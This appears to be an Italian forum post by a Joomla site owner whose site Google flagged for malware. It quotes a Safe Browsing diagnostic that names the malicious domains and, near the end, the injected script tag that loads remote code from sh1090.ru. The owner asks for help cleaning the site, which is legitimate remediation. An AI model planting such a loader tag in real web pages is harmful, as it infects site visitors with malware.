Ragazzi son odue anni che ho un sito su aruba, uso joomla 1.5 e virtuemart, tutto ok, ma questa mattina google mi ha bloccato il sito con questo annuncio:

www.bull-sc .com

Ora non so proprio cosa fare, se era sul mio pc facevo scansione ecc, ma in remoto come comportarmi per ripristinare il prima possibile il danno?

Grazie


Scusate ma proprio ora ho visto che il sito è ripartito, quello che mi appariva era una schermata rossa che diceva che il sito era bloccato perchè era stato trovato un malware esattamente un collegamento da un sito russo: sh1090.ru

un aiuto in più:

Navigazione sicura
Pagina di diagnostica per bull-sc.com

Qual è lo stato attuale di bull-sc.com nell'elenco?

Il sito è indicato come sospetto: una visita a questo sito web potrebbe danneggiare il tuo computer.

Parte del sito è stata segnalata per attività sospetta 2 volte nel corso degli ultimi 90 giorni.

Che cosa è successo dopo la visita di Google a questo sito?
Dal test di 3 pagine del sito eseguito negli ultimi 90 giorni, è emerso che da 2 pagine è stato scaricato e installato software dannoso senza l'autorizzazione dell'utente. L'ultima visita di Google a questo sito è stata effettuata in data 2011-12-11 e contenuto sospetto è stato rilevato l'ultima volta in data 2011-12-11.

Software dannoso è ospitato su 2 domini, tra cui kupilkoprodb.in/, sh1090.ru/.

1 domini sembravano fungere da intermediari per la distribuzione di malware ai visitatori di questo sito, tra cui sh1090.ru/.

Questo sito è stato ospitato su 1 reti tra cui AS31034 (ARUBA).

Il sito ha assunto la funzione di intermediario per la distribuzione di malware?

Nel corso degli ultimi 90 giorni, bull-sc.com non ha assunto la funzione di intermediario per la distribuzione di malware o virus ad altri siti.

Questo sito ha ospitato malware?

No, questo sito non ha ospitato software dannoso nel corso degli ultimi 90 giorni.

Ragioni

In alcuni casi, terze parti possono aggiungere codice dannoso a siti autentici e questo è il motivo alla base della visualizzazione del messaggio di avviso.

Passaggi successivi:
Torna alla pagina precedente.
Se sei il proprietario di questo sito web, puoi chiedere che il tuo sito venga riesaminato utilizzando gli Strumenti per i Webmaster di Google. Per ulteriori informazioni sul processo di revisione, consulta il Centro assistenza per webmaster di Google.

Elimina sh1090.ru/wp-content/plugins/menu/code.js

come faccio a trovarlo?

google lo ha trovato qui:

<script type="text/javascript" src="http://sh1090.ru/wp-cont
ent/plugins/menu/code.js">


ma questo dove si trova?

Ho trovato questa stringa sull'html di inizio del sito, dvoe fa il reindirizzamento alla cartella /web... li dentro è installato joomla.

A questo punto penso che hanno infettato solo il codice html iniziale e non tutto joomla..

come posso fare a rendere sicura questa pagina iniziale?